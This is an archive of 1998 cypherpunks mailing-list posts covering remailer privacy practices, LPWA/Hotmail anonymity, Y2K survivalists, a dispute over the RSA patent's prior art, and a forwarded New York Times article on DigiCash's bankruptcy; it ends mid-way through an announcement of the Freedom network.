> 
> A few rules of thumb result from even cursory examination
> of the likely environment:
> 
> 1. Do not send clear messages through the remailers 
>    except to public lists and newsgroups. Sending clear
>    messages to private correspondents provides the 
>    watchers with rich style and content material linked
>    to a correspondent. It is usually easy then to link
>    it back to you, and a firm correspondent pair is then
>    established in their database.
> 
> 2. Do not switch between clear and encrypted, remailed 
>    communication with the same correspondent. If your
>    correspondent relationships are mapped via clear,
>    conventional mail, those mappings can be applied to
>    your encrypted, remailed mail to greatly narrow 
>    down the possible recipients, and quite likely 
>    combine with traffic analysis to correlate your
>    outgoing message with one arriving at your
>    correspondent. If the only communications you have
>    with your deep contacts is by encrypted, chained
>    remailer, only fortuitous or statistical correlation
>    analysis or access to your or your correspondent's
>    host machines will tie the two of you together.
> 
> 3. Do not send traffic to significant correspondents
>    when traffic levels are likely to be low. Good
>    luck at guessing this. Probably the best way to
>    get a handle on traffic levels is to run a remailer
>    yourself.
> 
> 4. Send lots of chaff. Chain some messages through the
>    remailer cloud every day. If you have time and the
>    ability, write and release something that will allow
>    large numbers of people to send lots of chaff.
> 
> 5. Ultimately, the only way the remailers will provide
>    what might be described as Pretty Good Security will
>    be when we have software that maintains a regular
>    or random rate of messages to and from the remailer
>    cloud, a stream into which the meaningful messages
>    can be inserted with no visible change in traffic.
>    Until then, the best we can do is try to keep traffic
>    levels up, and to send and receive frequently enough
>    to frustrate end-to-end traffic analysis.
> 
> 6. Don't send anything that can have grave consequences.
> 
> 7. Take names. Always take names. Some day...
> 
> FUDBusterMonger
> 
> It Ain't FUD til I SAY it's FUD!
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Dec 1998 03:05:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: F.U.D. ... or "The Webmaster of this site is on more than weed"
Message-ID: <199811301823.TAA08331@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Ken Williams writes:

> I came across a funny article about a "CIA, DEA, FBI, Lucent 
> Technologies, Replay.com, Seed-bank.com Grand Conspiracy" at
> http://members.tripod.com/~spookbusters/sunnysnooping.htm

This is a critique of an article describing a way to do anonymous email
and how to use remailers.  The original article proposed using the Lucent
privacy proxy at www.lpwa.com as an intermediary to a free email server
like hotmail.  The critique got all hot and bothered over the fact that
Lucent is a government contractor and so the original post must have been
a plant by the FBI.

In fact, the LPWA-Hotmail technique is suitable for moderately secure
anonymity but not for lawbreaking.  This poster has used the technique
occasionally for over a year.  It is certainly better than hotmail alone,
since hotmail includes the originating IP address in its outgoing email.
By using LPWA, the originating IP field holds the LPWA IP address, and
the actual originating IP address is not revealed.

However, as LPWA clearly states in their privacy policy
(http://lpwa.com:8000/policy.html), they keep logs of connections,
and will make those available to law enforcement if presented with a
court order.  This would make it possible to track down the originating
IP which sent the mail.

Despite its limitations, this technique has the advantages of ease of
use and moderate security.  All you have to do is to set the lpwa.com
proxy in your browser, and use hotmail for email.  You can both send
and receive email, which is hard to do with any other technique.  It is
comparable in security and convenience to the late anon.penet.fi server,
which did much to increase awareness of anonymity technologies on the net.

(The original article was titled "Quick and Dirty Anonymity", which
seems an accurate enough description.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 1 Dec 1998 12:03:16 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
In-Reply-To: <19981130180002.17576.qmail@nym.alias.net>
Message-ID: <v0313031bb28913ca52a4@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:00 AM -0800 11/30/98, lcs Mixmaster Remailer wrote:

>There used to be a rule of thumb that you'd want roughly a megabyte
>per megahertz.  Today, with our 200+ MHz processors, we tend to have
>considerably less memory than this.  My Gateway PC from a couple of
>years ago came with a 200 MHz Pentium Pro but only 32 MB of memory.
>
>Most PCs today are not well balanced architecturally.  They should
>really have a couple hundred megabytes of memory.  Memory is cheap
>enough today that this can be added, but the motherboard configuration
>may limit the amount.  If you had this much memory, swapping to disk
>would be a smaller problem.

Some of us are more balanced...

My G3 Powerbook has 160 MB of RAM for a 240 MHz processor.

My recollection is that "Amdahl's Law" was only a rule of thumb within an
order of magnitude or so. I'm not a computer architect, so I don't what a
good ratio today would be.

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Tue, 1 Dec 1998 09:28:22 +0800
To: cypherpunks@toad.com
Subject: somebody clue this person in please!
Message-ID: <Pine.SOL.4.05.9811301950110.4917-100000@ultra15-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

i'm laughing too damned hard to do it myself.

Regards,

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

_____________________________________________________________
Get Your Private, Free, Encrypted Email at http://www.nsa.gov


- ---------- Forwarded message ----------
Received: from cc02mh.unity.ncsu.edu (cc02mh.unity.ncsu.edu [152.1.1.144])
	by cc01mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id TAA00863
	for <jkwilli2@cc01mh.unity.ncsu.edu>; Mon, 30 Nov 1998 19:04:29 -0500 (EST)
From: ILovToHack@aol.com
Received: from imo22.mx.aol.com (imo22.mx.aol.com [198.81.17.66])
	by cc02mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id TAA05341
	for <jkwilli2@unity.ncsu.edu>; Mon, 30 Nov 1998 19:04:39 -0500 (EST)
Received: from ILovToHack@aol.com
	by imo22.mx.aol.com (IMOv16.10) id QVOZa08724
	 for <jkwilli2@unity.ncsu.edu>; Mon, 30 Nov 1998 19:01:47 +1900 (EST)
Message-ID: <f7e063e.366331eb@aol.com>
Date: Mon, 30 Nov 1998 19:01:47 EST
To: jkwilli2@unity.ncsu.edu
Mime-Version: 1.0
Subject: Re: more FUD!
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
X-Mailer: Casablanca - Windows sub 224

In a message dated 11/30/98 10:15:50 AM EST, jkwilli2@unity.ncsu.edu writes:

> Get Your Private, Free, Encrypted Email at http://www.nsa.gov

I looked around there site and couldnt find anything about geting a e-mail
could you please be more specific.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNmM9eZDw1ZsNz1IXAQGp2ggAyiZR2yTdawgv5Dcrh4dOxpK1RCZD3+rL
YgQEf9JlvhG43KpK5ZXJNwG46gLZ/G1utg1Ux3DfsotBgce8Y5xO1GdXm+SmSw3S
fXlPSeeY93B+NQ5xaRHyLmMzV/YLMspNYKPZYuA+AI5XIWyL2fcWR8TcOpISWQ5r
UQphc7KBhZfDIObJ5nJzkv8gIDHn4qvlBqhNcjukw3GvJ9Edm8vS/P3Jlm9wiuXW
+kXWEVTX21xdBnG3iYdnQOyG69cmSQWKVN64Hetbi1tf0um2BJXQj82VOJtwbTp/
KFF650etU6OhrCnhV/Z/LYYNBYbG5r4/en2TbPyumIWd1DgujU8oNg==
=ed5P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Tue, 1 Dec 1998 10:34:36 +0800
To: petro@playboy.com (Petro)
Subject: gunnuts and Y2K
In-Reply-To: <v04011708b288dcbc4881@[206.189.103.230]>
Message-ID: <199812010154.TAA17022@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



> At 8:10 AM -0500 11/30/98, Martinus Luther wrote:
> >It looks like Gary North isn't really interested in the year 2000
> >problem. What he is interested in seems to be guns. He's latched on to
> >this issue because it allows him to think and write more about guns.
> >And, like so many other gunwankers he seems to get off fantasising about
> >the total collapse of civil society because that way he gets to feel
> >good about his guns. All this obession with death and destruction is a
> >bit strange in someone rumoured to be a Christian.

Well... I think that dismissing someone's thoughts on the basis of
psychobabble is never a good idea. Gary North's psyche may or may not be
fucked up, but even fucked up people oftentimes come up with good ideas.

On the other hand, the above is a good observation that I happen to agree
with. If you browse misc.survivalism (a useful newsgroup) you would
see a lot of gunnuts who can't have a single good idea of their own,
except for inventing scenarios where their guns may become useful.

I am not suggesting that all gunnuts are stupid, or that it is imprudent
to own firearms to prepare for various contingencies, not at all. I am
even very much pro-second amendment.

But objectively, there is a large category of people who are bored
with their current lifestyle and gleefully expect a "total breakdown"
of the society so that they could shoot live man sized targets instead
of boring paper targets.

They are likely to be disappointed by Y2K, or so I expect. (again,
my expectation that social breakdown is not likely to happen does
not preclude me from reasonable preparations)

The interesting question that arises out of all this, is trying to
predict what these people's impact on the actual Y2K events would be.

Would there be a big number of unprovoked shootings at groups of blacks
who happen to walk down on a wrong street? How should people behave in
order not to get shot by mistake? Would those people contribute to any
unrest that could happen? Which areas are best avoided?

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 1 Dec 1998 11:45:59 +0800
To: cypherpunks@cyberpass.net
Subject: SternFUD on RSA
Message-ID: <199812010235.UAA19311@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



:)

David Sternlight <david@sternlight.com> opines:
 
> I am not on the Cypherpunks list. Given the tone of some posters I
> don't' see that as a useful list.
 
I wonder who won the pool on how long you would last before departing
in a tiff. :)
 
But I digress.
 
> You already made this argument. It could have been (and perhaps was)
> made in court. Despite that the patent was upheld. That is "I am
> right and the court is wrong."
 
I think that regulations which permit applied math to be patented are
counterproductive, as do many other countries.  Given that such
regulations are in place in the United States, one would expect them
to be upheld by the courts.  Whether any of this is "wrong" in some
abstract sense is a religious debate, in which I am uninterested.
 
Let us examine the two statements:
 
 I.  Certainly, given what was known at the time widespread
     data communications created a commercial demand for
     secure communication over insecure lines, a person
     setting out to create a software solution to the
     problem, knowing what was then known about
     cryptography, trapdoor functions, and other techniques,
     would almost certainly have employed modular
     exponentiation or discrete logs to solve the problem.
     If RSA hadn't been patented at the time it was, it most
     certainly would have been independently discovered by
     multiple individuals and widely employed, without the
     present licensing restrictions.  Prior published works
     on cryptographic trapdoor functions involving the
     factoring of composites and possibly even encryption by
     modular exponentiation existed long before the RSA
     patent.
 
II.  Obvious prior art sufficient [in the current regulatory
     environment surrounding patents in the US] to
     invalidate the RSA patent in court has never been
     published.
 
Now, given that these two statements are not opposites of each other,
one is not going to refute the first by stating the second, no matter
how big a bullhorn one employs.
 
>> There is a huge difference between "prior art" and "invalidating prior
>> art" under patent law.  Indeed, to invalidate the patent, it would
>> have been necessary not only to find a description of the mathematical
>> methods used in the construction of the RSA algorithm, but also a
>> claim for the specific use for secure communication over insecure data
>> links.
 
> It seems to me you are agreeing with my comment here.
 
I have only argued that obvious prior art exists.  I have also stated
that I would favor a regulatory climate in which such obvious prior
art would preclude a patent being granted.  I have never stated that
we currently live in such a regulatory climate.  In fact, we do not.
 
> Pretty far-fetched response. They tried to overturn the patent on
> grounds of prior art. They failed. End of story.
 
Many words, like "prior art," have specific legal meanings which
differ from their common English usage.  Kind of like economists
arguing that there is no "demand" for food by poor people, because
they have no money with which to purchase it.  I use the term "obvious
prior art" to mean prior publication of the essential methods and
techniques with which a technically skilled person, given the same
problem to solve, would arrive at the same or a similar solution.
 
Put two graduate students at opposite ends of a wire, with the world's
prior-to-1977 writings on cryptography, trapdoor functions, the
intractablity of factoring the product of primes, and the modular
exponentiation problem.  I suspect the RSA Public Key Cryptosystem
would not be long in emerging, even if one employed particularly dense
graduate students.
 
That is what I mean when I use the term "obvious prior art."
 
> Again, it seems you've conceded my point here. What part of "nobody"
> don't you understand?
 
I was proceeding upon the assumption that the enumerated "points" you
claimed I was making were ones with which you disagreed.  If that is
not the case, I am prepared to declare early victory.
 
"Nobody could afford to litigate [against RSADSI]" is misleading, as
even the wealthy don't employ the expensive option, when a cheap one
is available.  Besides, I have never contested that the current
regulatory climate supports the patenting of things like RSA even in
the presence of prior publication of the essential mathematical
elements.
 
>>> 6. Anyone can patent anything and nobody could afford to oppose them
>>> (N.B. Presumably not IBM, not DEC, not DuPont, ..oh well, you get the
>>> idea)
 
>> Yes, David.  Practically anything can be patented.  The power of
>> patents is in defending them, not in applying for them, or in
>> receiving them.
 
> Again you concede my point by ignoring the operative clause. What
> part of "nobody" don't you understand?
 
There were plenty of companies who had the financial power to squash
RSADSI like a grape, and probably change the regulatory climate as
well.  There was no incentive for them to do so, and they probably
have applied mathematical patents of their own which they are fond of.
 
Had RSADSI sat on the patent, and refused to license it to others,
both they and their patent would probably have had a very short life
span.
 
>>> 7. Rich, smart companies with big legal departments license bogus
>>> patents rather than litigating.
 
>> Well, that depends on how you define bogus.  I consider patenting
>> applied math to be bogus.  Your mileage may vary.
 
> RSA didn't patent applied math. They patented processes which may
> use, or be described in part with applied math.
 
Yes, the "method and apparatus" transformation.
 
> The facts are that rich, smart companies litigate patents all the
> time so your contention is false on its face.
 
They rarely litigate patents where the cost to litigate is enormous,
the technology may be cheaply licensed, and the chances of success, or
of even trying to explain the topic to the average layman, are
minimal.
 
>> Someone who responds to a one line comment about the mathematical
>> underpinnings of RSA being previously known, with several multipage
>> essays whose central thesis is that such a claim cannot possible be
>> true, because the patent would have been invalidated by the courts, is
>> a troll who either understands nothing about how patents work, or is
>> blowing a foghorn on behalf of the patent holder.
 
> Another guilty plea.
 
Well, I suppose Vin could just be a bored essayist in need of
something to practice on.  (Snicker)
 
>>> 9. If someone takes the time to oppose me, someone must be funding him.
 
>> Vin has already outed himself as someone who has done work for
>> RSADSI.  He has vociferously defended various key recovery schemes
>> implemented in their products against critics.  This, combined with
>> his rabid insistance that the RSA patent is something novel and
>> unique, does equate to what some of us might describe as a "vested
>> interest" in the matter, directly funded or not.
 
> Another failed refutation. Your words were unequivocal.
 
I think you are having some difficulty separating out the sarcasm
here.  Besides, the suggestion that Vin has a vested interest in
defending the RSA patent hardly translates into an assertion that
everyone who disagrees with me on some subject is someone's paid
agent.
 
Abstraction from the specific to the general is not an accepted tool
of inference.
 
You, for instance, are probably quibbling for entirely different
reasons.
 
> I think the problem with most of your post is that you have taken the
> odd exception or the odd passing issue and tried to make them out to
> be the general case; in short your post was highly overblown as well
> as redolent of personal attack. Had you discussed the issue more
> temperately in terms of your factual claims it might have been more
> useful.
 
That sometimes happens when one party "summarizes" a flame war, and
posts it elsewhere.  Deal.
 
>>> 10. The patent office never refuses patents on "method and apparatus"
>>> except in the case of perpetual motion machines.
 
>> Patent examiners generally rely only upon the material presented with
>> the patent application when reviewing it, and expect people to do
>> their own searches, and correctly cite related patents.  Litigation is
>> generally the means by which patents are challenged, not by the patent
>> office refusing them, except in extrordinary circumstances, perpetual
>> motion machines being one well-known example.
 
> See above. You were unequivocal.
 
"Practically anything" is not unequivocal, and is a correct
description of the current patent review climate.
 
> There may be cases of the sort you refer to, but it is not a general
> argument which can then be applied to the case of the RSA patent. You
> have repeatedly make the logical error of claiming that a specific
> proved a general, and then applying the claimed general to a different
> specific.
 
Vin alleged that RSA being granted a patent proffered compelling
evidence of the unique worth of the thing being patented.  It is
correct to apply general comments about the patent-granting climate to
this specific case.  For a better example of confusing generals and
specifics, you may re-read your own comments on "if someone opposes
me, someone must be funding them" above, incorrectly abstracting my
comments about Vin to the general population. :)
 
>>> 11. Security Dynamics is paying for those who oppose me.
 
>> I merely asked if Vin intended to bill them for the time he spent
>> writing his rants.  A rhetorical question.
 
> GIven the rest of your post, the inference was direct. If you did not
> intend to imply that, you should not have used that languaging.
 
Bzzzzzzzz. Wrong Answer.
 
And we will have to deduct additional points for abstracting again
from Vin to the general population vis a vis "Security Dynamics is
paying for those who opppose me."
 
The best you can get on this mid-term is now a C. :)
 
>>> 12. Such opposition is "a tirade".
 
>> Suggesting that I would have to retire my nym after criticizing the
>> RSA patent and taking several pages to say a paragraph of material
>> certainly qualifies as a tirade in my book, especially when combined
>> with a lot of irrelevent innuendo unrelated to the topic being
>> discussed.
 
> Since most of his post was factual, it was not a tirade.
 
Most of the factual material refuted nothing I was claiming, and
refuted things I wasn't claiming, such as Jevon's book containing a
complete description of PKC, as opposed to being the earliest known
work which contained something related to the topic.
 
Again, an attempt to impress people with the volume of the evidence,
rather than with its quality, which when combined with the occasional
snide remark, meets my definition of "tirade."
 
> You are trying to discredit the bulk of his post with a
> characterization of a small portion that doesn't apply to the whole,
> and may not even apply to the portion.
 
His post is discredited because it fails to address any of my points
about the RSA patent, and instead argues forcibly for a collection of
self-evident surrogate issues, carefully selected for their ability to
be easily confused with the real ones.
 
>>> 13. No corporations are buying products with GAK, key recovery, etc.
>>> (N.B.  in That is what "no corporate demand" means).
 
>> To an economist, perhaps.  It would be more accurate to say that
>> demand as a function of whether such features are included is a
>> pretty flat function.
 
> You didn't say that. You said "no corporate demand". I understand the
> word "no" because English is my mother tongue.
 
"Demand" in common English usage means that something is being
clamored for.  In Economic terms, it means half of the phrase "supply
and demand" which is something entirely different, said economic
demand existing for anything which is purchased.
 
> that the demand curve has a particular (flat) shape, did you make that
> up or did you rely on empirical evidence?
 
I believe that surveys by privacy groups long ago showed that GAK/Key
Escrow/Key Recovery was not being clamored for by corporate America,
although attempts were being made to incentivize it by the
intelligence and law enforcement communities.
 
> Your statement that "demand as a function of" X is a pretty flat
> function is also nonsense economics. Perhaps you meant to say that the
> _quantity demanded_ is invariant over whether these features are
> included or not.
 
I was using "demand" in its ordinary English usage.  You were using it
as an economic term, in an attempt to call the mere fact that GAK/Key
Escrow/Key Recovery-enabled software was purchased at all "demand" for
it.  Which, to use one of Clinton's favorite phrases, was "technically
accurate, although misleading."  :)
 
> Or perhaps you meant to say that the demand curve as a function of X
> was 'one-to-one onto' itself.
 
Uh, no.  That was definitely not what I was saying.  I don't think it
is what you are trying to say either, but thanks for using "1-1" and
"onto" in a sentence about functions.
 
> To test your hypothesis, you'd have to show that if two versions were
> offered simultaneously, one with and one without X, no corporate buyer
> would prefer the version with X.
 
That would kind of depend on how "X" was priced, would it not?  If you
give things away for free, people will probably take one in case they
need it someday, as it costs them nothing.
 
This does not equate to "demand," or "clamoring."
 
> I leave the reason that would the the dispositive experiment as an
> exercise. Hint: It's utility economics.
 
Hint:  It's not quite English.
 
>>> 14. Someone who opposes stronger escrow/GAK/key recovery than RSA is
>>> offering must be suspect.
 
>> Your point here eludes me.
 
> You said that he opposed escrow/GAK/key recovery except up to the
> point offered by RSA. That translates as he opposes such things if
> they were stronger than those offered by RSA. Nothing suspect about
> that--he simply agrees with the decision point RSA chose as to how
> strong to make such things.
 
That's one possible explanation.  To test your hypothesis, we should
see how well Vin's agreement tracks RSA's inclusion of additional
encrow/GAK/recovery features in the future.  He may have to change the
name of "The Privacy Guild" to something less impressive.
 
>>> I could go on ...
 
>> And you usually do, and on, and on, and on...
 
> And now you're diverging from the facts and logic of the matter to
> personal attack. It reveals the same flaw that invalidated your
> original post.
 
I'm sure you've been attacked before, by people a lot less nice than
myself. :)
 
>> I simply believe that patents on applied math are inappropriate.
>> Given that they are allowed, it seems silly to cite the fact that the
>> courts uphold them as evidence for anything, particularly claims that
>> they are new, novel, and non-obvious.
 
> Had you said that we could have had a rational discussion. Points in
> the discussion would have included:
 
> 1. Even patent law agrees with you; the RSA patent is a process
> patent and not a patent on applied math.
 
Hmmm.  Well, patents on pure math are not allowed, ergo, math must
be suitably transformed in order to be patented.
 
> 2. Patents purely on applied math, are, as far as anyone here knows
> not allowed. You may exponentiate to your heart's content as long as
> you don't practice the RSA algorithm as part of a crypto system.
 
There is a fundamental difference between telling me I cannot practice
modular exponentiation to communicate with people without licensing
it, and telling me I cannot make RDRAMs without licensing that.
 
I am unlikely to replicate the RDRAM design by accident.  I am quite
likely to derive a given bit of mathematics given the application for
it.
 
If RSA can be patented, why not something like Householder transforms,
or cluster analysis, or the quadratic formula?  Sounds like the
slippery slope to me.
 
> 3. The court didn't uphold a patent on applied math; it upheld a
> process patent on a crypto system that, among other things, uses
> applied math. So does almost any engineering design.
 
There is a fundamental difference between a physical machine whose
design required the use of mathematics, and an abstract mathematical
transformation, which may exist only in an instance of some computer
program performing a certain task.
 
> 4. The particular process patent was found to be new, novel, and
> non-obvious. There was ample opportunity for Cylink to try to refute
> that. They failed. End of story.
 
Again, returning to the top of our discussion, the existence of
"obvious prior art" for RSA in the common English sense meaning of
"obvious prior art" has little to do with whether patents are upheld
in the current regulatory climate in the United States.
 
It would be simple to test your hypothesis, by simply giving trapdoor
functions replete with useful identities to two people, and telling
they have to construct a common secret unknown to a third party
monitoring their communication.  I cannot imagine a technically
skilled person taking very long to make the transition from some
"one-way" functions, to a practical implementation of D-H, RSA, or
whatever.
 
That would be my definition of "obvious."
 
> Now we've discussed all the above substance before, and my purpose in
> reciting the four points isn't to re-open the topic, but to show that
> your definition of what the topic is is simply incorrect.
 
My posts.  My topic.  Your posts.  Your topic.  Works for me. :)
 
> Given that, I don't propose to discuss the above four points yet
> again. They aren't there to reopen the discussion, but to show that
> your statement of the issue is inaccurate.
 
My statement is point "I" at the beginning of this message.  Please
re-read it and tell me whether or not you agree with it.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Dec 1998 10:41:54 +0800
To: cypherpunks@cyberpass.net
Subject: NYT (online only?) article on DigiCash Chapt. 11
Message-ID: <v04020a05b288fcd5fc42@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



...Wherein I get quoted in the NYT, for the first time in my life, using
"bummed out".

Oh, well. At least they spelled my name right... :-).

Cheers,
Bob Hettinga

--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Mon, 30 Nov 1998 20:35:32 -0500
To: Digital Bearer Settlement List <dbs@philodox.com>
From: Robert Hettinga <rah@shipwright.com>
Subject: Electronic Cash for the Net Fails to Catch On
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/


--- begin forwarded text


Date: Mon, 30 Nov 1998 20:28:03 -0500
From: "Robert A. Hettinga" <rah@philodox.com>
Reply-To: rah@philodox.com
MIME-Version: 1.0
To: rah@shipwright.com
Subject: Electronic Cash for the Net Fails to Catch On

http://www.nytimes.com/library/tech/98/11/cyber/articles/28cash.html


<fair use snippage>

November 28, 1998


Electronic Cash for the Net Fails to Catch On

By PETER WAYNER

 here are two conflicting epigrams that rule the computer industry. The
first is that the pioneer gets all of the gold, and the second is that the
pioneer gets all of the arrows in the back. Several recent high-profile
failures in the electronic payment industry suggest that efforts to develop
versions of electronic cash for the Internet are so far reaping more arrows
than riches.



Christine M. Thompson


The most recent signal came as
<http://www.nytimes.com/library/tech/98/11/cyber/articles/#1>Digicash, a
closely watched electronic payment company based in Palo Alto, Calif.,
filed for bankruptcy protection. The company was known for a collection of
tools that made it possible for people to spend small amounts of money over
the Internet using what is known as a digital wallet, software that handles
transactions in a manner similar to cash. One advantage of the Digicash
system is that, unlike credit cards, it allowed consumers to make purchases
anonymously.

While several major banks expressed interest in the Digicash system and a
few actually began offering accounts, the company was unable to generate
enough mass interest among merchants or consumers. Consumers were reluctant
to use Digicash because there weren't many merchants who accepted it, and
merchants didn't sign up to participate because consumers weren't demanding
it as a payment option.

Other companies that have tried to develop digital cash systems haven't
fared much better. Last August, another pioneer, First Virtual, shut down
its system for processing electronic cash transactions and began to focus
on a new business, interactive messaging, according to a company
spokeswoman, Cindy Alvarez. Another company, CyberCash,
still offers a system called CyberCoin, but most of the company's revenue
comes from processing credit card transactions.

Industry observers suggest that one reason electronic payment systems
haven't taken off is that consumers have become more comfortable using
credit cards to make purchases online.

Bill Curry, a spokesman for Amazon.com,
said credit cards are used for "the overwhelming majority" of transactions
on the company's site. "I think the reason is that we do have an encrypted
secure server, and we guarantee the transaction. If there are unauthorized
charges on your account as a result of shopping at Amazon.com, we'll pay
the $50 that's not covered by your credit-card issuers."

Bill Trevor, director of customer service at CDNow, said
most of CDNow's customers enter their credit-card numbers on the site. "Our
experience is showing that in the month of October, roughly four fifths of
our customers felt secure enough to put their credit card in our online
form. Almost all of the rest are checks or money order. There are a couple
of percentage points for people who call us, fax us or e-mail their
credit-card number, but it's less than 3 percent."

Companies that process credit card transactions have found more success
than the wallet-based businesses.


CDNow allows customers to send a separate e-mail message with the credit
card number encrypted with PGP, a significantly higher-grade of encryption
than is normally used to protect most browser-based transactions.

Companies that process credit card transactions for e-commerce Web sites
have found more success than the wallet-based businesses, like Digicash.
Keith Miller is an executive vice president of Ibill, a
company that processes credit card transactions for Web merchants. "We
looked into that whole thing when we started a couple of years ago," he
said, referring to companies that were building separate software packages
for processing payments. "Back then, our biggest competitors were the
wallet companies. We went after the market saying, why do we need to
reinvent something when we have something that works and is simple, easy
and quick?"

In the end, Ibill chose to make it simple for people to buy something
online by typing a credit card number into a browser. The browser uses a
security method known as SSL (Secure Socket Layers) to protect the data.
This doesn't offer the same protection as the carefully designed wallets,
but has so far been acceptable to consumers. This approach has become so
popular that one of the wallet pioneers, Cybercash, has developed a similar
system and now derives more profits from simple SSL-based credit card
transactions than through the wallets the company continues to develop.

What remains to be seen is whether digital cash systems will ever find a
market.

Paul Kocher, an expert on cryptography who has analyzed many digital
payment mechanisms, said it would take the support of a major player for an
electronic cash system to be successful. "If someone like Visa or IBM threw
their weight behind a system and got a lot of backers, it might take off. I
don't see how a small company like Digicash could ever get a system
deployed and working."

Digicash's plans for the future are uncertain, in part because the company
must pay off past debts by holding what amounts to an auction of its
technology. But the fact that some companies are interested in Digicash's
patents indicates that there may still be hope for some sort of electronic
payment system. In particular, industry observers say that these systems'
ability to allow consumers to make purchases online anonymously may yet
prove valuable.

<more fair use snippage...>

Related Articles
<http://www.nytimes.com/library/tech/98/11/biztech/articles/04card.html>Got
a Dime? Citibank and Chase End Test of Electronic Cash
(November 11, 1998)

<http://www.nytimes.com/library/tech/98/06/biztech/articles/22card.1.jpg>Code Br
eaker Cracks Smart Cards' Digital Safe
(June 22, 1998)

Scott Loftesness, the interim chief executive of Digicash, said the company
is exploring many different options and has already received one offer for
some of its patents. One of the patents provides an easy way for someone to
sign or authorize a document without reading it, a process that is often
called a "blind signature." This is the foundation for the anonymity
Digicash offers its customers and may also have a variety of other untapped
applications.

Robert Hettinga, a digital cash consultant and one of the organizers of the
Financial Cryptography conference held annually in Anguilla, said, "I would
like to try to get a syndicate together to buy the [blind signature]
patent. We would hold it and license it in a way that everyone could use
it. I would be really bummed out if they took that patent and locked it
away for another eight years."

Others are more cynical about the possibility that any micropayment model
will ever become dominant. William Powar, a former Visa executive who is
now a venture capitalist in Silicon Valley, said one problem with digital
wallet systems is that they are designed for small one-time purchases.
"There's no market where pay per use is significant," he said. "Look at the
cable model."

Powar points out that while newspapers, magazines and cable operators offer
one-time consumption options through newsstands or special cable
subscriptions, the bulk of their revenue comes from subscriptions and
advertising. This suggests to him that micropayment systems won't be a
crucial part of the future of the Internet, which would diminish the need
for digital cash systems.

In the near future, the electronic digital transaction industry is focusing
on another goal: processing bills for utilities, credit card companies,
telephone companies and others who normally bill customers via postal mail.
Several new ventures, like Ibill, as well as established companies like
Netscape Communications Corp., are working on technologies to allow
consumers to pay
their bills online.

Netscape's system, called BillerXpert, will let consumers pay bills over
the Web using, among other options, the payment mechanism designed by
CyberCash. The bill presentment industry hopes to save money on postage
while also providing additional services, like personalized content.


Related Sites
These sites are not part of The New York Times on the Web, and The Times
has no control over their content or availability.

<http://www.digicash.com>Digicash

<http://www.cybercash.com>CyberCash

<http://www.amazon.com>Amazon.com

<http://www.cdnow.com>CDNow

<http://www.ibill.com>Ibill

<http://www.netscape.com>Netscape Communications Corp.


Peter Wayner at <mailto:pwayner@nytimes.com>pwayner@nytimes.com welcomes
your comments and suggestions.


<final bit of fair use snippage>


--- end forwarded text

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Austin Hill" <austin@zks.net>
Date: Tue, 1 Dec 1998 10:41:51 +0800
To: <remailer-operators@anon.lcs.mit.edu>
Subject: Freedom & AnonymousIP network
Message-ID: <000b01be1cd0$6ce561e0$1901a8c0@austin.zks.net>
MIME-Version: 1.0
Content-Type: text/plain



This may be of interest to members of this list or people that you may all
know.   If you have any questions, or know of ISPs who support privacy on
the Internet, please forward this to their attention.

Thanks.


-Austin

---------------------------------------------------------------
